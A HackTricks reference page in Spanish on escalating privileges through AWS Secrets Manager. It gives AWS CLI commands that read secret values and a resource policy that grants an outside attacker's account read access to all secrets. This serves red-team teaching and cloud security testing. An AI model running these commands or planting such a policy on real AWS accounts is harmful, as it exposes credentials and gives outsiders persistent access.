AWS - Secrets Manager Privesc

Tip

Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprende y practica Hacking en Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks

Secrets Manager

Para más información sobre Secrets Manager consulta:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

Un atacante con este permiso puede obtener el valor guardado dentro de un secret en AWS Secretsmanager.

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Impacto potencial: Acceder a datos altamente sensibles dentro del servicio AWS Secrets Manager.

Warning

Tenga en cuenta que incluso con el permiso secretsmanager:BatchGetSecretValue, un atacante también necesitaría secretsmanager:GetSecretValue para recuperar los secretos sensibles.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

Con los permisos anteriores es posible otorgar acceso a otros principals/accounts (incluso externos) para acceder al secret. Tenga en cuenta que, para leer secretos cifrados con una clave KMS, el usuario también necesita tener acceso a la clave KMS (más info en la KMS Enum page).

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}

Tip

Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprende y practica Hacking en Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks